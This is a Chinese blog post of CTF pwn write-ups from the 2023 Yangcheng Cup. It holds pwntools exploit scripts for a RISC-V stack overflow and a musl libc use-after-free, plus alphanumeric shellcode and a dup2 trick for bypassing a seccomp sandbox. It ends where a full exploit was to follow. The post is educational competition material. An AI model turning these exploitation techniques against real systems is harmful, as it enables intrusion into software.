<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/32gl-A.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/16gl-A.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="汇总并复盘近期一些比赛的 wp。">
<meta property="og:type" content="article">
<meta property="og:title" content="wp">
<meta property="og:url" content="http://example.com/2023/09/04/wp/index.html">
<meta property="og:site_name" content="Anza | 学习记录">
<meta property="og:description" content="汇总并复盘近期一些比赛的 wp。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://anza.oss-cn-hangzhou.aliyuncs.com/img/202309042023909.png">
<meta property="og:image" content="https://anza.oss-cn-hangzhou.aliyuncs.com/img/202309042208620.png">
<meta property="og:image" content="https://anza.oss-cn-hangzhou.aliyuncs.com/img/202309042215362.png">
<meta property="og:image" content="https://anza.oss-cn-hangzhou.aliyuncs.com/img/202309042233884.png">
<meta property="og:image" content="https://anza.oss-cn-hangzhou.aliyuncs.com/img/202309042303386.png">
<meta property="og:image" content="https://anza.oss-cn-hangzhou.aliyuncs.com/img/202309051943811.png">
<meta property="og:image" content="https://anza.oss-cn-hangzhou.aliyuncs.com/img/202309051949413.png">
<meta property="og:image" content="https://anza.oss-cn-hangzhou.aliyuncs.com/img/202309060005178.png">
<meta property="og:image" content="https://anza.oss-cn-hangzhou.aliyuncs.com/img/202309060009110.png">
<meta property="og:image" content="https://anza.oss-cn-hangzhou.aliyuncs.com/img/202309061637538.png">
<meta property="article:published_time" content="2023-09-04T12:14:08.000Z">
<meta property="article:modified_time" content="2023-09-06T08:38:28.804Z">
<meta property="article:author" content="Anza">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://anza.oss-cn-hangzhou.aliyuncs.com/img/202309042023909.png">

<link rel="canonical" href="http://example.com/2023/09/04/wp/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>wp | Anza | 学习记录</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="Anza | 学习记录" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Anza | 学习记录</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2023/09/04/wp/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/Haida.png">
      <meta itemprop="name" content="Anza">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Anza | 学习记录">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          wp
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2023-09-04 20:14:08" itemprop="dateCreated datePublished" datetime="2023-09-04T20:14:08+08:00">2023-09-04</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2023-09-06 16:38:28" itemprop="dateModified" datetime="2023-09-06T16:38:28+08:00">2023-09-06</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/ctf/" itemprop="url" rel="index"><span itemprop="name">ctf</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/ctf/pwn/" itemprop="url" rel="index"><span itemprop="name">pwn</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>汇总并复盘近期一些比赛的 wp。</p>
<span id="more"></span>

<h1 id="2023羊城杯初赛"><a href="#2023羊城杯初赛" class="headerlink" title="2023羊城杯初赛"></a>2023羊城杯初赛</h1><p>参考 wp：<a target="_blank" rel="noopener" href="http://blog.xmcve.com/2023/09/03/%E7%BE%8A%E5%9F%8E%E6%9D%AF-2023-Writeup/#title-30">星盟</a></p>
<h2 id="1-risky-login"><a href="#1-risky-login" class="headerlink" title="1. risky_login"></a>1. risky_login</h2><p>risc-v 架构程序下的栈溢出，ida 下无法进行反编译，需要用到 <strong>ghidra</strong>。程序就一个简单的栈溢出和整数溢出，覆盖返回地址为后门函数即可。</p>
<p><img src="https://anza.oss-cn-hangzhou.aliyuncs.com/img/202309042023909.png" alt="image-20230904202324815"></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">io = remote(<span class="string">&quot;tcp.cloud.dasctf.com&quot;</span>, <span class="number">24273</span>)</span><br><span class="line"></span><br><span class="line">backdoor = <span class="number">0x12345770</span></span><br><span class="line"></span><br><span class="line">io.sendafter(<span class="string">b&quot;Input ur name:\n&quot;</span>, <span class="string">b&quot;/bin/sh\x00&quot;</span>)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*<span class="number">256</span> + p64(backdoor)</span><br><span class="line">io.sendafter(<span class="string">b&quot;Input ur words&quot;</span>, payload)</span><br><span class="line"></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="2-cookieBox"><a href="#2-cookieBox" class="headerlink" title="2. cookieBox"></a>2. cookieBox</h2><p>musl libc pwn，版本是 v1.1.24，存在 UAF 漏洞。</p>
<p>需要 patchelf 为目标 libc.so 才能在有 musl 环境的 ubuntu 上运行：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">patchelf ./cookieBox --set-interpreter ./libc.so cookieBox</span><br></pre></td></tr></table></figure>

<p>通过堆初始化泄露 Libc，通过 UAF，打 unbin 劫持全局变量区域上的堆指针为 __io_FILE，通过 puts 即可触发链子。更详细的细节可以参考另一篇博客<code>musl pwn</code>。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">io = process(<span class="string">&#x27;./cookieBox&#x27;</span>)</span><br><span class="line">libc = ELF(<span class="string">&quot;./libc.so&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add</span>(<span class="params">size, content</span>):</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;&gt;&gt;&quot;</span>, <span class="string">b&#x27;1&#x27;</span>)</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;Please input the size:\n&quot;</span>, <span class="built_in">str</span>(size).encode())</span><br><span class="line">    io.sendafter(<span class="string">b&quot;Please input the Content:\n&quot;</span>, content)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">free</span>(<span class="params">idx</span>):</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;&gt;&gt;&quot;</span>, <span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;Please input the idx:\n&quot;</span>, <span class="built_in">str</span>(idx).encode())</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">edit</span>(<span class="params">idx, content</span>):</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;&gt;&gt;&quot;</span>, <span class="string">b&#x27;3&#x27;</span>)</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;Please input the idx:\n&quot;</span>, <span class="built_in">str</span>(idx).encode())</span><br><span class="line">    io.sendafter(<span class="string">b&quot;Please input the content:\n&quot;</span>, content)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">show</span>(<span class="params">idx</span>):</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;&gt;&gt;&quot;</span>, <span class="string">b&#x27;4&#x27;</span>)</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;Please input the idx:\n&quot;</span>, <span class="built_in">str</span>(idx).encode())</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">debug</span>():</span><br><span class="line">    gdb.attach(io)</span><br><span class="line"></span><br><span class="line">add(<span class="number">0x10</span>, <span class="string">b&#x27;a&#x27;</span>*<span class="number">8</span>)   <span class="comment">#0</span></span><br><span class="line">add(<span class="number">0x10</span>, <span class="string">b&#x27;b&#x27;</span>*<span class="number">8</span>)   <span class="comment">#1</span></span><br><span class="line">add(<span class="number">0x100</span>, <span class="string">b&#x27;c&#x27;</span>*<span class="number">0x10</span>)  <span class="comment">#2</span></span><br><span class="line">add(<span class="number">0x10</span>, <span class="string">b&#x27;d&#x27;</span>*<span class="number">0x8</span>) <span class="comment">#3</span></span><br><span class="line"></span><br><span class="line">show(<span class="number">0</span>)</span><br><span class="line">libc_base = u64(io.recvuntil(<span class="string">b&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>, <span class="string">b&#x27;\x00&#x27;</span>)) - <span class="number">0x292e50</span></span><br><span class="line"></span><br><span class="line">log.success(<span class="string">&quot;libc_base===&gt;&quot;</span>+<span class="built_in">hex</span>(libc_base))</span><br><span class="line"></span><br><span class="line">stdout = libc_base + libc.sym[<span class="string">&quot;__stdout_FILE&quot;</span>]</span><br><span class="line">system = libc_base + libc.sym[<span class="string">&quot;system&quot;</span>]</span><br><span class="line">mal = libc_base + <span class="number">0x292ac0</span></span><br><span class="line"></span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line">add(<span class="number">0x10</span>, <span class="string">b&#x27;e&#x27;</span>*<span class="number">0x8</span>) <span class="comment">#4(1)</span></span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line">free(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">edit(<span class="number">4</span>, p64(stdout) + p64(<span class="number">0x602060</span>))</span><br><span class="line">add(<span class="number">0x10</span>, <span class="string">b&#x27;f&#x27;</span>*<span class="number">0x8</span>)</span><br><span class="line"></span><br><span class="line">debug()</span><br><span class="line">pause()</span><br><span class="line"></span><br><span class="line">payload = <span class="string">b&#x27;/bin/sh\x00&#x27;</span></span><br><span class="line">payload += <span class="string">b&#x27;X&#x27;</span> * <span class="number">64</span></span><br><span class="line">payload += p64(system)</span><br><span class="line">edit(<span class="number">2</span>, payload)</span><br><span class="line"></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="3-shellcode"><a href="#3-shellcode" class="headerlink" title="3. shellcode"></a>3. shellcode</h2><p>十分有趣的一道 shellcode 题目，跟着 wp 调试的时候感觉自己想象力还是太匮乏了😵。</p>
<p>刚开始有个输入 2 字节的输入，一开始不知道怎么利用，看了 wp 才知道 syscall 也是二字节<code>\x0f\x05</code>，后面 call 的时候需要返回到这个上面。</p>
<img src="https://anza.oss-cn-hangzhou.aliyuncs.com/img/202309042208620.png" alt="image-20230904220843487" style="zoom: 50%;" />

<p>进入关键程序，读入一串长度为 17 的 shellcode 后 call 调用，只允许使用<code>OPQRSTUVWXYZ[\]^_</code> ，且开启了沙箱，只允许 orw。</p>
<img src="https://anza.oss-cn-hangzhou.aliyuncs.com/img/202309042215362.png" alt="image-20230904221523314" style="zoom:50%;" />

<p>除了 O 以外可以自单编码（即一个字符即可组成一句指令）：</p>
<table>
<thead>
<tr>
<th align="center">ASCII字符</th>
<th align="center">HEX</th>
<th align="center">汇编指令</th>
</tr>
</thead>
<tbody><tr>
<td align="center">P</td>
<td align="center">0x50</td>
<td align="center">push rax</td>
</tr>
<tr>
<td align="center">Q</td>
<td align="center">0x51</td>
<td align="center">push rcx</td>
</tr>
<tr>
<td align="center">R</td>
<td align="center">0x52</td>
<td align="center">push rdx</td>
</tr>
<tr>
<td align="center">S</td>
<td align="center">0x53</td>
<td align="center">push rbx</td>
</tr>
<tr>
<td align="center">T</td>
<td align="center">0x54</td>
<td align="center">push rsp</td>
</tr>
<tr>
<td align="center">U</td>
<td align="center">0x55</td>
<td align="center">push rbp</td>
</tr>
<tr>
<td align="center">V</td>
<td align="center">0x56</td>
<td align="center">push rsi</td>
</tr>
<tr>
<td align="center">W</td>
<td align="center">0x57</td>
<td align="center">push rdi</td>
</tr>
<tr>
<td align="center">X</td>
<td align="center">0x58</td>
<td align="center">pop rax</td>
</tr>
<tr>
<td align="center">Y</td>
<td align="center">0x59</td>
<td align="center">pop rcx</td>
</tr>
<tr>
<td align="center">Z</td>
<td align="center">0x5a</td>
<td align="center">pop rdx</td>
</tr>
<tr>
<td align="center">_</td>
<td align="center">0x5b</td>
<td align="center">pop rdi</td>
</tr>
<tr>
<td align="center">^</td>
<td align="center">0x5c</td>
<td align="center">pop rsi</td>
</tr>
<tr>
<td align="center">\</td>
<td align="center">0x5d</td>
<td align="center">pop rsp</td>
</tr>
<tr>
<td align="center">[</td>
<td align="center">0x5e</td>
<td align="center">pop rbx</td>
</tr>
</tbody></table>
<p>在程序执行 call shellcode 的时候，我们需要观察一下寄存器以及栈的环境，来看看有哪些可以利用：</p>
<img src="https://anza.oss-cn-hangzhou.aliyuncs.com/img/202309042233884.png" alt="image-20230904223352829" style="zoom:50%;" />

<p>我们看一下 wp 给的 shellcode，各个指令功能如注释所示：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">shellcode1 = asm(</span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">push rax</span></span><br><span class="line"><span class="string">pop rsi		# 给 RSI 赋 RAX ，其实也是 RIP</span></span><br><span class="line"><span class="string">push rbx</span></span><br><span class="line"><span class="string">pop rax		# 给 RAX 赋 RBX = 0</span></span><br><span class="line"><span class="string">push rbx</span></span><br><span class="line"><span class="string">pop rdi		# 给 RDI 赋 RBX = 0</span></span><br><span class="line"><span class="string">pop rcx</span></span><br><span class="line"><span class="string">pop rcx</span></span><br><span class="line"><span class="string">pop rsp		# 抬高 RSP 到 SHELLCODE 附近</span></span><br><span class="line"><span class="string">pop rbp		# 给 RBP 赋 0x50f</span></span><br><span class="line"><span class="string">push rbp</span></span><br><span class="line"><span class="string">push rbp</span></span><br><span class="line"><span class="string">push rbp</span></span><br><span class="line"><span class="string">push rbp</span></span><br><span class="line"><span class="string">push rbp	# 压低栈在 shellcode 的结尾，使得执行完 shellcode 可以直接执行 0x50f（syscall）</span></span><br><span class="line"><span class="string">pop rdx		# 给 RDX 赋 RBP = 0x50f</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span>).ljust(<span class="number">17</span>, <span class="string">b&#x27;Y&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># read(0, RIP, 0x50f)</span></span><br></pre></td></tr></table></figure>

<img src="https://anza.oss-cn-hangzhou.aliyuncs.com/img/202309042303386.png" alt="image-20230904230350331" style="zoom:50%;" />

<p>由此我们可以在栈上写入 orw 的 shellcode，但我们需要观察一下题目的沙箱，可以发现：</p>
<ol>
<li>调用 read 函数时其 fd 必须小于等于 2 ，不然直接 kill，但 open 一个文件一般返回的 fd 都是 &gt;= 3。</li>
<li>调用 write 函数时其 fd 必须大于 2，不然直接 kill。</li>
</ol>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">=================================</span><br><span class="line"> <span class="number">0000</span>: <span class="number">0x20</span> <span class="number">0x00</span> <span class="number">0x00</span> <span class="number">0x00000004</span>  A = arch</span><br><span class="line"> <span class="number">0001</span>: <span class="number">0x15</span> <span class="number">0x00</span> <span class="number">0x12</span> <span class="number">0xc000003e</span>  <span class="keyword">if</span> (A != ARCH_X86_64) <span class="keyword">goto</span> <span class="number">0020</span></span><br><span class="line"> <span class="number">0002</span>: <span class="number">0x20</span> <span class="number">0x00</span> <span class="number">0x00</span> <span class="number">0x00000000</span>  A = sys_number</span><br><span class="line"> <span class="number">0003</span>: <span class="number">0x35</span> <span class="number">0x00</span> <span class="number">0x01</span> <span class="number">0x40000000</span>  <span class="keyword">if</span> (A &lt; <span class="number">0x40000000</span>) <span class="keyword">goto</span> <span class="number">0005</span></span><br><span class="line"> <span class="number">0004</span>: <span class="number">0x15</span> <span class="number">0x00</span> <span class="number">0x0f</span> <span class="number">0xffffffff</span>  <span class="keyword">if</span> (A != <span class="number">0xffffffff</span>) <span class="keyword">goto</span> <span class="number">0020</span></span><br><span class="line"> <span class="number">0005</span>: <span class="number">0x15</span> <span class="number">0x0d</span> <span class="number">0x00</span> <span class="number">0x00000002</span>  <span class="keyword">if</span> (A == open) <span class="keyword">goto</span> <span class="number">0019</span></span><br><span class="line"> <span class="number">0006</span>: <span class="number">0x15</span> <span class="number">0x0c</span> <span class="number">0x00</span> <span class="number">0x00000021</span>  <span class="keyword">if</span> (A == dup2) <span class="keyword">goto</span> <span class="number">0019</span></span><br><span class="line"> <span class="number">0007</span>: <span class="number">0x15</span> <span class="number">0x00</span> <span class="number">0x05</span> <span class="number">0x00000000</span>  <span class="keyword">if</span> (A != read) <span class="keyword">goto</span> <span class="number">0013</span></span><br><span class="line"> <span class="number">0008</span>: <span class="number">0x20</span> <span class="number">0x00</span> <span class="number">0x00</span> <span class="number">0x00000014</span>  A = fd &gt;&gt; <span class="number">32</span> <span class="meta"># read(fd, buf, count)</span></span><br><span class="line"> <span class="number">0009</span>: <span class="number">0x25</span> <span class="number">0x0a</span> <span class="number">0x00</span> <span class="number">0x00000000</span>  <span class="keyword">if</span> (A &gt; <span class="number">0x0</span>) <span class="keyword">goto</span> <span class="number">0020</span></span><br><span class="line"> <span class="number">0010</span>: <span class="number">0x15</span> <span class="number">0x00</span> <span class="number">0x08</span> <span class="number">0x00000000</span>  <span class="keyword">if</span> (A != <span class="number">0x0</span>) <span class="keyword">goto</span> <span class="number">0019</span></span><br><span class="line"> <span class="number">0011</span>: <span class="number">0x20</span> <span class="number">0x00</span> <span class="number">0x00</span> <span class="number">0x00000010</span>  A = fd <span class="meta"># read(fd, buf, count)</span></span><br><span class="line"> <span class="number">0012</span>: <span class="number">0x25</span> <span class="number">0x07</span> <span class="number">0x06</span> <span class="number">0x00000002</span>  <span class="keyword">if</span> (A &gt; <span class="number">0x2</span>) <span class="keyword">goto</span> <span class="number">0020</span> <span class="keyword">else</span> gotco <span class="number">0019</span></span><br><span class="line"> <span class="number">0013</span>: <span class="number">0x15</span> <span class="number">0x00</span> <span class="number">0x06</span> <span class="number">0x00000001</span>  <span class="keyword">if</span> (A != write) <span class="keyword">goto</span> <span class="number">0020</span></span><br><span class="line"> <span class="number">0014</span>: <span class="number">0x20</span> <span class="number">0x00</span> <span class="number">0x00</span> <span class="number">0x00000014</span>  A = fd &gt;&gt; <span class="number">32</span> <span class="meta"># write(fd, buf, count)</span></span><br><span class="line"> <span class="number">0015</span>: <span class="number">0x25</span> <span class="number">0x03</span> <span class="number">0x00</span> <span class="number">0x00000000</span>  <span class="keyword">if</span> (A &gt; <span class="number">0x0</span>) <span class="keyword">goto</span> <span class="number">0019</span></span><br><span class="line"> <span class="number">0016</span>: <span class="number">0x15</span> <span class="number">0x00</span> <span class="number">0x03</span> <span class="number">0x00000000</span>  <span class="keyword">if</span> (A != <span class="number">0x0</span>) <span class="keyword">goto</span> <span class="number">0020</span></span><br><span class="line"> <span class="number">0017</span>: <span class="number">0x20</span> <span class="number">0x00</span> <span class="number">0x00</span> <span class="number">0x00000010</span>  A = fd <span class="meta"># write(fd, buf, count)</span></span><br><span class="line"> <span class="number">0018</span>: <span class="number">0x25</span> <span class="number">0x00</span> <span class="number">0x01</span> <span class="number">0x00000002</span>  <span class="keyword">if</span> (A &lt;= <span class="number">0x2</span>) <span class="keyword">goto</span> <span class="number">0020</span></span><br><span class="line"> <span class="number">0019</span>: <span class="number">0x06</span> <span class="number">0x00</span> <span class="number">0x00</span> <span class="number">0x7fff0000</span>  <span class="keyword">return</span> ALLOW</span><br><span class="line"> <span class="number">0020</span>: <span class="number">0x06</span> <span class="number">0x00</span> <span class="number">0x00</span> <span class="number">0x00000000</span>  <span class="keyword">return</span> KILL</span><br></pre></td></tr></table></figure>

<p>可以发现题目还给了 dup2 系统调用白名单，dup2 介绍如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">dup2 可以复制一个现存的文件描述符：int dup2 (int oldfd, int newfd)。</span><br><span class="line">dup2(3, 0) 即将 flag 文件描述符 3 改成了文件描述符 0，即通过文件描述符 0 即可访问到 flag 文件数据。</span><br></pre></td></tr></table></figure>

<p>因此利用 dup2 可以绕过 read 限制，利用沙箱 fd 和系统调用 fd <strong>数据类型不统一</strong>绕过 write 限制，orw 的 shellcode 如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">shellcode2 = asm(</span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">sub rsp, 0x2000</span></span><br><span class="line"><span class="string">mov eax, 0x67616c66 ;// flag</span></span><br><span class="line"><span class="string">push rax</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">mov rdi, rsp</span></span><br><span class="line"><span class="string">xor eax, eax</span></span><br><span class="line"><span class="string">mov esi, eax</span></span><br><span class="line"><span class="string">mov al, 2</span></span><br><span class="line"><span class="string">syscall ;// open</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">mov edi, eax</span></span><br><span class="line"><span class="string">mov esi, 0</span></span><br><span class="line"><span class="string">mov eax, 33</span></span><br><span class="line"><span class="string">syscall ;// dup2</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">mov edi, 0</span></span><br><span class="line"><span class="string">mov rsi, rsp</span></span><br><span class="line"><span class="string">mov edx, 0x01010201</span></span><br><span class="line"><span class="string">sub edx, 0x01010101</span></span><br><span class="line"><span class="string">xor eax, eax</span></span><br><span class="line"><span class="string">syscall ;// read</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">mov edx, eax</span></span><br><span class="line"><span class="string">mov rsi, rsp</span></span><br><span class="line"><span class="string">xor eax, eax</span></span><br><span class="line"><span class="string">inc eax</span></span><br><span class="line"><span class="string">mov edi, eax</span></span><br><span class="line"><span class="string">mov rcx, 0x8000000000000000</span></span><br><span class="line"><span class="string">add rdi, rcx</span></span><br><span class="line"><span class="string">syscall ;// write</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p>完整 EXP 如下：</p>
